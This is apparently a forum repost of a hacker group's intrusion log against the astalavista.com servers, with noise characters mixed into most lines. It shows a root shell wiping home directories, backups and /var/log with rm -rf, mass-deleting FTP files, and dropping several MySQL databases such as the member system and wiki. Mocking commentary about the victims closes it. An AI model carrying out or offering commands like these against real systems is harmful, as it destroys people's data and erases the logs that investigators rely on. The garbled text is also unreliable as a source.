4 v* A/ J8 h+ j+ N* s8 f-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar2 m9 E8 o! D9 q
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
: r( I1 A: v! X' Q H[snip]
3 R) k% ^% Q8 v8 n; T226 Transfer complete.( E# d2 H. S9 R0 O! [
ftp> mdelete *: n6 f' k1 @. r1 W* }& u& Q
ftp> ls -la* P: J$ `# M5 W9 a* M' u2 U, D8 ]
227 Entering Passive Mode (212,254,194,163,2,193)
+ I6 z' E: [3 K& ^- \! F150 Opening BINARY mode data connection for ‘file list’.
# z$ k) W. L. n3 [+ C* R$ {0 Z226 Transfer complete.
8 I) w L, u$ L$ \) a2 S; Z8 cftp>+ T6 x R( {3 }& |! q' R# o; q
0 i5 A/ |6 V8 ~) T( V) k4 s8 Q/ B' w3 csh-3.2# cd /home |' e) ^7 `; v# w: R, C
sh-3.2# ls -la
0 V4 |( d( j. T- stotal 1208 U( q# Y) t& r& D/ o- B% G3 m
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .* Q+ c( y. T9 z8 N5 _2 R
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..0 I& I4 @+ s8 I+ J
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
2 ] b$ B: X! P9 ^-rw——- 1 root root 8192 Jun 4 03:03 aquota.group& ]: T! S: ]2 i( ^" ?) D
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
7 ^6 }0 Z# E; y: r+ s6 x3 ^drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
; e7 n/ f, t: m& Pdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
2 G1 A9 k( l% ^ Cdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141613 h5 b+ x5 T; x) s. a! f4 ]$ C& \
drwx–x–x 10 com com 4096 Apr 28 12:40 com* Y; S- ]/ e8 K) B% j8 B7 d
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
A! k2 G, h2 gdrwx—— 3 jon jon 4096 Sep 21 2007 jon
{. @- `0 e8 b n( vdrwx—— 2 root root 16384 Sep 11 2007 lost+found
3 U: [% F6 `. n6 z- p$ P& vdrwxr-xr-x 2 root root 4096 Sep 14 2007 my7 C: z4 {5 }7 W9 {5 d0 Z
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata1 ?; Y5 n* p7 \
drwx—— 2 jon jon 4096 Sep 15 2007 test& g; c4 Q2 ]$ t! A5 K8 l
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp: B2 @ K, H: V) t: O" M. A
/ o- b5 Y0 i3 I+ i9 r: ^sh-3.2# rm -rf backup/
$ _/ T) z* E: qsh-3.2# rm -rf backup.14161/. |1 h# u- P( R0 P& y' ?; g
sh-3.2# rm -rf ftp/& \* V7 e" L9 ]0 i4 S9 q
sh-3.2# rm -rf jon/
) s H4 |) Z' {/ j' esh-3.2# rm -rf my/
7 o) ?3 ~0 ?& r$ C2 j" ish-3.2# rm -rf mysqldata/! o( y- u9 }! b" `0 ~8 S! _; V
sh-3.2# rm -rf test/
+ y2 V8 A N" esh-3.2# rm -rf tmp/
* F; G5 Y D/ o3 j- [sh-3.2# cd ~
# U. [0 {# J/ Lsh-3.2# rm -rf *
0 P$ `7 ~3 B! I/ S( Xsh-3.2# rm -rf /var/log/) F3 Q. z; C- U* M0 d0 n
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
! a6 Q/ y! G; e5 @# @sh-3.2# rm -rf /home/*' a$ }/ w, ?' f$ w& ~& G9 r
sh-3.2# mysql
" i: W) t& h/ W& _Welcome to the MySQL monitor. Commands end with ; or \g.
7 L5 E1 c0 O" b- T4 X+ qYour MySQL connection id is 407156
1 U$ H. `; z3 p) b) y* W1 [+ UServer version: 5.0.45-community-log MySQL Community Edition (GPL)
- |. A# F. W- M. c* a6 c4 _$ O. h! N" H& N- U- \
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 D$ j. Y8 w9 C. i5 k7 v
+ w+ J' m/ Y: O* V( D# h7 amysql> show databases;, ^7 Z+ ^( r! S3 s4 y+ s& S& Y
+———————–+% ^8 z9 {: k9 k( A% w
| Database |# x5 y0 ? w& @' }6 t3 [
+———————–+- S6 t9 ]0 s" E& H- T
| information_schema |& H9 w, x# D; @2 o# A
| astanet_ads |
; u. f4 s2 m2 y0 t& J| astanet_mailing_lists |
6 P: j, P6 c) }| astanet_mediawiki |# ~/ [: n- |: y# O$ N* K1 H4 |4 v
| astanet_membersystem |- h9 x" K2 G8 U5 r4 O, Z% `1 D0 s
| com_contrexx |
* G! p" _1 N8 i4 V" h0 l3 {# z| com_contrexx2 |( \) B E# w0 n; D0 O% M0 X
| com_contrexx2_live |3 E4 _8 |& ~( z( R4 S+ I3 h
| da_roundcube | k0 V# l0 |; e% ?+ G, D
| dolphin | a( W7 n$ F. x( W; m
| ideapool |
% p- R: H& o4 w( W' L| mysql |
7 `7 d0 l: z- e! x7 b; v| test |( U1 `, c; ^) S' s; t" ?$ o
| yourmaster | R7 ]! k% O+ p, t- ^! R
+———————–+
5 N: k5 b) E! A4 a14 rows in set (0.03 sec)' f. P5 [* d5 `6 r9 {
4 G+ q1 s- w! G5 smysql> drop database astanet_membersystem;; r3 k8 }, U, ^% E
droQuery OK, 46 rows affected (0.81 sec)
; C9 Z1 E& e8 A+ X2 }! l
* N2 E. w8 r9 S5 l% s$ Hmysql> drop database com_contrexx;8 w9 Y9 R4 w' k8 X+ r9 x% h
Query OK, 211 rows affected (2.72 sec)
' F& ?& o1 `0 A0 F! p$ | m" ^4 P# |+ `/ {
mysql> drop database com_contrexx2;" L1 Z8 Q5 l8 }* r$ W9 u2 H; g3 z
Query OK, 237 rows affected (2.23 sec)+ H- }6 j" o1 o, J8 q2 ~. e
% G2 C, G8 A9 p/ c7 |1 b
mysql> drop database com_contrexx2_live;; p+ |6 x6 o/ w9 @9 s
Query OK, 227 rows affected (7.63 sec)
0 y5 i& I' m8 U* z. `% c- N8 U8 a1 z8 _% ]. ]# Q4 l
mysql> drop database ideapool;
6 `; j$ _! m+ A# pQuery OK, 69 rows affected (0.19 sec)
) T a! G) H* D# l' [+ h5 f- i% B% C% e
mysql> drop database yourmaster; Y( \: G8 w; {* i. G
Query OK, 158 rows affected (0.55 sec)
+ Q2 O' J5 x; s/ n3 z6 G2 E8 Q) S2 h/ h
mysql> drop database astanet_ads;
: B e+ n5 F8 i- B& y7 c h. q5 wQuery OK, 9 rows affected (0.11 sec)1 A4 A3 P1 L1 q. j9 A+ o3 A8 n" Q8 @
: M( V4 c3 _: V7 l! s( imysql> drop database astanet_mailing_lists;% L# q' F% q: Q3 Z
Query OK, 24 rows affected (1.47 sec)
$ z0 G9 d Z5 |( R8 e/ C8 D/ E$ `( _. f
2 U2 p: C( p7 a# E, Emysql> drop database astanet_mediawiki;
6 b. o- u/ ^! u5 VQuery OK, 31 rows affected (0.51 sec)1 W/ [ z* V: b+ r; t
) c- t( V# @1 H( n- n8 M; W% W) X" Omysql> show databases;
! f0 ~% F8 V9 k1 D0 ^+——————–+
* m0 Z! p# W: Q. I' Y| Database |( A; A5 i: W' P7 @# ?+ N2 y
+——————–+2 U, R$ G& d: D6 z5 G9 U$ X
| information_schema |
' g! k2 S& @7 |3 T4 I' L| da_roundcube |$ G4 H& m4 ~$ r8 {8 S* H/ Y2 j" j
| dolphin |4 M, T. D2 G. A. Y
| mysql | O+ f( K3 B( A2 i$ b5 `9 b
| test |
Q$ \' `4 |% A/ L4 H( ]) ~+——————–+
& W& s$ D: H6 J- a5 A [$ p( n5 rows in set (0.00 sec)
0 L0 k4 Q; [$ M; G( P- X2 a
/ B6 q) b1 U) |* D4 `) b. V) uWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
* V+ E+ A( Q" U8 Qtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the7 }: G0 J7 Q" e+ Q
wrong to say this pack of morons *wont be back*.: E9 `/ J8 F( J% y
|
发表于 2012-11-6 21:07:34
收藏
支持
反对